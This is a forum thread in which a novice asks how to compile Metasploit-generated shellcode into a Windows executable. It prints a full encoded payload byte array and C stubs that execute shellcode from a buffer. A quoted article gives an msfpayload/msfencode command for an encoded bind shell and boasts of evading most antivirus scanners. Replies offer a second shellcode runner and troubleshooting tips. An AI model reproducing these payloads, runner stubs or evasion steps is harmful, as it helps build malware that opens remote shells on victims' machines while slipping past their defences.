Compile Metasploit payload in C/C++ How?

[yyyx_yyyz]

helo,

im a noob of compiling metasploit generated payload in c format. and compile it in any windows c/c++ compiler. i tried it in MingGW and borland and visual C. Using this method...

1. i generate the metasploit payload with a format of C. the result is below:

unsigned char buf[] =
"\xdb\xc5\xd9\x74\x24\xf4\x29\xc9\x5f\xbd\x14\x21\ x6c\xf7\xb1"
"\x45\x83\xc7\x04\x31\x6f\x16\x03\x6f\x16\xe2\xe1\ xdd\x84\x7e"
"\x09\x1e\x55\xe1\x80\xfb\x64\x33\xf6\x88\xd5\x83\ x7d\xdc\xd5"
"\x68\xd3\xf5\x6e\x1c\xfb\xfa\xc7\xab\xdd\x35\xd7\ x1d\xe1\x9a"
"\x1b\x3f\x9d\xe0\x4f\x9f\x9c\x2a\x82\xde\xd9\x57\ x6d\xb2\xb2"
"\x1c\xdc\x23\xb7\x61\xdd\x42\x17\xee\x5d\x3d\x12\ x31\x29\xf7"
"\x1d\x62\x82\x8c\x55\x9a\xa8\xcb\x45\x9b\x7d\x08\ xb9\xd2\x0a"
"\xfb\x4a\xe5\xda\x35\xb3\xd7\x22\x99\x8a\xd7\xae\ xe3\xcb\xd0"
"\x50\x96\x27\x23\xec\xa1\xfc\x59\x2a\x27\xe0\xfa\ xb9\x9f\xc0"
"\xfb\x6e\x79\x83\xf0\xdb\x0d\xcb\x14\xdd\xc2\x60\ x20\x56\xe5"
"\xa6\xa0\x2c\xc2\x62\xe8\xf7\x6b\x33\x54\x59\x93\ x23\x30\x06"
"\x31\x28\xd3\x53\x43\x73\xbc\x90\x7e\x8b\x3c\xbf\ x09\xf8\x0e"
"\x60\xa2\x96\x22\xe9\x6c\x61\x44\xc0\xc9\xfd\xbb\ xeb\x29\xd4"
"\x7f\xbf\x79\x4e\xa9\xc0\x11\x8e\x56\x15\xb5\xde\ xf8\xc6\x76"
"\x8e\xb8\xb6\x1e\xc4\x36\xe8\x3f\xe7\x9c\x9f\x07\ x7f\xdf\x08"
"\x86\xf5\xb7\x4a\x89\x1c\xfb\xc2\x6f\x74\xeb\x82\ x38\xe0\x92"
"\x8e\xb3\x91\x5b\x05\x51\x51\xce\xa2\xf0\x06\x66\ xa9\x25\x60"
"\x29\x52\x00\xfb\xe0\xc6\xeb\x93\x0c\x07\xec\x63\ x5b\x4d\xec"
"\x0b\x3b\x35\xbf\x2e\x44\xe0\xc9\x73\xe8\x61\xca\ x25\x5c\x21"
"\xa2\xcb\xbb\x05\x6d\x34\xee\x97\x51\xe3\xd7\x1d\ xa3\x86\x3b"
"\xde\x46";

the result generated code.


and copy and then paste <framework32>/data/templates/template.c

but i dont know where to insert. so i tried this method.

#include <stdio.h>



unsigned char payload[] =
"\xdb\xc5\xd9\x74\x24\xf4\x29\xc9\x5f\xbd\x14\x21\ x6c\xf7\xb1"
"\x45\x83\xc7\x04\x31\x6f\x16\x03\x6f\x16\xe2\xe1\ xdd\x84\x7e"
"\x09\x1e\x55\xe1\x80\xfb\x64\x33\xf6\x88\xd5\x83\ x7d\xdc\xd5"
"\x68\xd3\xf5\x6e\x1c\xfb\xfa\xc7\xab\xdd\x35\xd7\ x1d\xe1\x9a"
"\x1b\x3f\x9d\xe0\x4f\x9f\x9c\x2a\x82\xde\xd9\x57\ x6d\xb2\xb2"
"\x1c\xdc\x23\xb7\x61\xdd\x42\x17\xee\x5d\x3d\x12\ x31\x29\xf7"
"\x1d\x62\x82\x8c\x55\x9a\xa8\xcb\x45\x9b\x7d\x08\ xb9\xd2\x0a"
"\xfb\x4a\xe5\xda\x35\xb3\xd7\x22\x99\x8a\xd7\xae\ xe3\xcb\xd0"
"\x50\x96\x27\x23\xec\xa1\xfc\x59\x2a\x27\xe0\xfa\ xb9\x9f\xc0"
"\xfb\x6e\x79\x83\xf0\xdb\x0d\xcb\x14\xdd\xc2\x60\ x20\x56\xe5"
"\xa6\xa0\x2c\xc2\x62\xe8\xf7\x6b\x33\x54\x59\x93\ x23\x30\x06"
"\x31\x28\xd3\x53\x43\x73\xbc\x90\x7e\x8b\x3c\xbf\ x09\xf8\x0e"
"\x60\xa2\x96\x22\xe9\x6c\x61\x44\xc0\xc9\xfd\xbb\ xeb\x29\xd4"
"\x7f\xbf\x79\x4e\xa9\xc0\x11\x8e\x56\x15\xb5\xde\ xf8\xc6\x76"
"\x8e\xb8\xb6\x1e\xc4\x36\xe8\x3f\xe7\x9c\x9f\x07\ x7f\xdf\x08"
"\x86\xf5\xb7\x4a\x89\x1c\xfb\xc2\x6f\x74\xeb\x82\ x38\xe0\x92"
"\x8e\xb3\x91\x5b\x05\x51\x51\xce\xa2\xf0\x06\x66\ xa9\x25\x60"
"\x29\x52\x00\xfb\xe0\xc6\xeb\x93\x0c\x07\xec\x63\ x5b\x4d\xec"
"\x0b\x3b\x35\xbf\x2e\x44\xe0\xc9\x73\xe8\x61\xca\ x25\x5c\x21"
"\xa2\xcb\xbb\x05\x6d\x34\xee\x97\x51\xe3\xd7\x1d\ xa3\x86\x3b"
"\xde\x46";
int main(int argc, char **argv)
{
(*(void (*)()) payload)();
return(0);
}

i change "unsigned char buf[] to unsigned char payload[]

Succesfully compiled but the problem is there is warning: no newline at end of file. and i tried to run... it connects but it stops in "Uploading DLL". Can someone help me about this im totaly a noob.. and trying to learn. Im trying to create/modify the code and compile my own. Thank you very much....

[Gitsnik]

Try not using the meterpreter payload and see how that goes for you.

[Lincoln]

What are you trying to do? Are you wanting to create a payload from msfpayload in C and add it to a public exploit, or your exploit?

ex: You found an exploit on milw0rm but want to change the payload.

Some good info on this thread: http://forums.remote-exploit.org/pen...shellcode.html

[yyyx_yyyz]

What are you trying to do? Are you wanting to create a payload from msfpayload in C and add it to a public exploit, or your exploit?

sort of i think.. i generate a msf payload through msfencode and the ouput is in C. not EXE. so that i can compile it to my own. I get this idea: below

So, I've seen a few articles pauldotcom (except ours will work encoded) and SANS covering sending a Metasploit payload through scanners and some of the mileage people are seeing. Most have gotten down to around 6 of 36 listed on virustotal.com . I thought I'd give it a go and see for myself. Here's how I got detected by 1 of 36 in one turn.


Now we use msfpayload piped to msfencode with the ever so popular x86/shikata_ga_nai encoder: Code:
./msfpayload windows/shell_bind_tcp LPORT=30000 R | ./msfencode -e x86/shikata_ga_nai c > ~/binder.c



Now we have our bind shell encoded and waiting in binder.c. From here, you can simply cut and paste this code straight into <framework32>/data/templates/template.c

Finally, we compile that into a windows executable using Mingw32. Uploading this to virustotal.com showed that AVG was the only scanner to detect our payload.

[Lincoln]

Finally, we compile that into a windows executable using Mingw32

For the cross compiling check out the last video.

Up and Running Backtrack 4 - Offensive Security

[lupin]

sort of i think.. i generate a msf payload through msfencode and the ouput is in C. not EXE. so that i can compile it to my own. I get this idea: below

What you are seeing in the output of the metasploit command is a c style buffer full of assembly opcodes - its shellcode. You wont be able to change what the payload actually does unless you disassemble the shellcode and modify it in assembler.

That warning you were getting about "no newline at end of file" isn't serious - its a "warning" which does not stop compilation, as opposed to an "error" which does. You fix it by putting a newline at the end of your c source file.

[hitthemlow]

No big deal, what you are missing is that shellcode is a self sustained chunck of opcodes that although it runs fine when it gets executed bit by bit, isnt meant to be run as a full program. You have two options if you want to persue this, the hard wayand the easy way.

The hard way involves editing the shellcode into a full fledged ASM program.

The easy way invlovles letting the compiler do the work by using the exece() call or by putting the shellcode (once its back in ASM form) in an _asm brace.

[lupin]

You can also try using the following c code to turn your shellcode into an executable (taken from the Metasploit Windows shellcode site). However (and this is the point I was trying to make before) you're not really gaining anything by creating the code in c format from Metasploit and then compiling into a Windows executable UNLESS you go about changing the shellcode in assembler before you compile. And if you want to learn assembler theres better aproaches to learning it than this.

Alternatively, if you want to learn how to write this type of code in c start off with a program thats actually written in c.

Code:

char shellcode[] =
"<code_here>";

int main(int argc, char **argv)
{
  int (*funct)();
  funct = (int (*)()) shellcode;
  (int)(*funct)();
}

[yyyx_yyyz]

thanks for the reply and advice.... now i started to research all the advice given here... this is really not easy for me... specially assembly... god bless me....